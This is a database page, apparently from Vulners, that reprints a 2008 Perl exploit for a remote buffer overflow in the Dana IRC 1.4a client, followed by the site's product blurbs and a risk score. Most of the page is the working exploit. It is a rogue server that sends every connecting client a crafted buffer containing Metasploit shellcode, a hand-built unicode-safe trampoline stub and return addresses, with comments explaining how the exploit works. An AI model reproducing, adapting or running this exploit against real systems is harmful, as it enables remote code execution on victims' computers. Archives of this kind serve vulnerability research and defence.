Vulners
Lucene search
Dana IRC 1.4a Remote Buffer Overflow Exploit
#!/usr/bin/perl
# k`sOSe - 08/24/2008
# This is a useless and not portable exploit code, tested only on my winxp-sp3 VM.
# I was looking for a vuln to write an exploit for when I found this PoC:
#
# http://www.milw0rm.com/exploits/5817
#
# The author wrote:
# "The reason why there isnt any shellcode here is because the client is
# coverting the junk/buffer data to unicode so its corrupting the shellcode,
# ive tried sending unicode buffer but the same problem occurs.
# if anyone else can get further please let me know. but i doubt you can"
#
# It is for this reason, a small suggestion of impossibility(copyright Phantasmal Phantasmagoria)
# that i decided to write this. Actually it was pretty funny :)
#
# The first problem is how to redirect the execution flow to our buffer, the buffer can be found
# at three different locations:
# - at some address on the stack converted to unicode
# - at some address on the heap again converted to unicode
# - at some address on the heap in plain ASCII
#
# Unfortunately none of these addresses are unicode friendly :(.
# But.. there is an address on the stack that points in the middle of the buffer(the one on the
# stack), all we need is to pop the stack 6 times and then return.
# To achieve this we return 2 times on a unicode friendly pop,pop,pop,ret.
#
# The second problem is that the buffer on the stack is converted to unicode(so \x41 -> \x00\x41)
# *and* must be, with some exceptions, in the \x01 -> \x59 space... so I decided to write a
# unicode friendly ASM stub that will load the address of the ASCII version of the buffer in EAX
# using offsets from a register(somewhat related to our buffer), push it and then return.
#
# On my box this works 100 times out of 100 :)
use warnings;
use strict;
use IO::Socket;
my $sock = IO::Socket::INET->new( Proto => 'tcp', LocalPort => '16667', Listen => SOMAXCONN, Reuse => 1 );
my $ret = "\xa2\x41" ; # pop, pop, pop, ret
# metasploit shellcode
my $shellcode =
"\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a" .
"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48" .
"\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51" .
"\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43" .
"\x4a\x4a\x49\x4b\x4c\x4b\x58\x50\x44\x45\x50\x45\x50\x45" .
"\x50\x4c\x4b\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x45\x55\x44" .
"\x38\x45\x51\x4a\x4f\x4c\x4b\x50\x4f\x45\x48\x4c\x4b\x51" .
"\x4f\x47\x50\x43\x31\x4a\x4b\x47\x39\x4c\x4b\x50\x34\x4c" .
"\x4b\x43\x31\x4a\x4e\x46\x51\x49\x50\x4c\x59\x4e\x4c\x4b" .
"\x34\x49\x50\x42\x54\x44\x47\x49\x51\x48\x4a\x44\x4d\x43" .
"\x31\x49\x52\x4a\x4b\x4c\x34\x47\x4b\x46\x34\x46\x44\x44" .
"\x44\x43\x45\x4a\x45\x4c\x4b\x51\x4f\x51\x34\x43\x31\x4a" .
"\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f\x45" .
"\x4c\x45\x51\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x45\x51\x4a" .
"\x4b\x4d\x59\x51\x4c\x47\x54\x44\x44\x48\x43\x51\x4f\x50" .
"\x31\x4c\x36\x45\x30\x50\x56\x42\x44\x4c\x4b\x47\x36\x46" .
"\x50\x4c\x4b\x51\x50\x44\x4c\x4c\x4b\x44\x30\x45\x4c\x4e" .
"\x4d\x4c\x4b\x43\x58\x45\x58\x4c\x49\x4c\x38\x4b\x33\x49" .
"\x50\x43\x5a\x46\x30\x45\x38\x4c\x30\x4d\x5a\x44\x44\x51" .
"\x4f\x42\x48\x4c\x58\x4b\x4e\x4c\x4a\x44\x4e\x51\x47\x4b" .
"\x4f\x4a\x47\x47\x33\x47\x4a\x51\x4c\x50\x57\x50\x49\x50" .
"\x4e\x50\x44\x50\x4f\x46\x37\x46\x33\x51\x4c\x42\x53\x42" .
"\x59\x44\x33\x44\x34\x43\x55\x42\x4d\x47\x43\x50\x32\x51" .
"\x4c\x43\x53\x45\x31\x42\x4c\x45\x33\x46\x4e\x45\x35\x42" .
"\x58\x45\x35\x43\x30\x45\x5a\x41\x41";
# Black magic unicode friendly ASM stub that will load the shellcode address
# using offsets from a register that points near the shellcode.
my $trampoline = "\x52" . # push edx
"\x42" .
"\x58" . # pop eax
"\x42" .
"\x55" . # push ebp
"\x42" .
"\x44" . # inc esp
"\x42" .
"\x44" . # inc esp
"\x42" .
"\x59" . # pop ecx
"\x42" .
"\x41" . # inc ecx
"\x42" .
"\x41" . # inc ecx
"\x42" .
"\x41" . # inc ecx
"\x42" .
"\x41" . # inc ecx
"\x42" .
"\x41" . # inc ecx
"\x42" .
"\x41" . # inc ecx
"\x42" .
"\x41" . # inc ecx
"\x42" .
"\x41" . # inc ecx
"\x42" .
"\x41" . # inc ecx
"\x42" .
"\x41" . # inc ecx
"\x42" .
"\x51" . # push ecx
"\x42" .
"\x4c" . # dec esp
"\x42" .
"\x59" . # pop ecx
"\xec" . # add ah,ch
"\x42" .
"\x50" . # push eax
"\x42" .
"\x5e" . # pop esi
"\x42" .
"\x51" . # push ecx
"\x42" .
"\x44" . # inc esp
"\x42" .
"\x58" . # pop eax
"\x42" .
"\x54" . # push esp
"\x42" .
"\x5b" . # pop ebx
"\x42" .
"\x56" . # push esi
"\x42" .
"\x4B" . # dec ebx
"\x42" .
"\x4B" . # dec ebx
"\x42" .
"\x4b" . # dec ebx
"\x42" .
"\x4b" . # dec ebx
"\x42" .
"\x48" . # dec eax
"\x42" .
"\x48" . # dec eax
"\x42" .
"\x48" . # dec eax
"\x42" .
"\x48" . # dec eax
"\x03" . # ADD BYTE PTR DS:[EBX],AL
"\x03" . # ADD BYTE PTR DS:[EBX],AL
"\x03" . # ADD BYTE PTR DS:[EBX],AL
"\x03" . # ADD BYTE PTR DS:[EBX],AL
"\x42" .
"\x58" . # pop eax
"\x42" .
"\x44" . # inc esp // realign stack pointer
"\x42" .
"\x44" . # inc esp // realign stack pointer
"\x42" .
"\x50" . # push eax
"\x42" .
"\xc3" ; # ret
my $buf2 = $shellcode .
"\x41" x (784-length($shellcode)) .
$trampoline .
"\x62" x 158 .
$ret .
"\x41" x 6 .
$ret;
while(my $client = $sock->accept()) {
print $client "$buf2\r\n";
}
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 Aug 2008 00:00Current
7.1High risk
Vulners AI Score7.1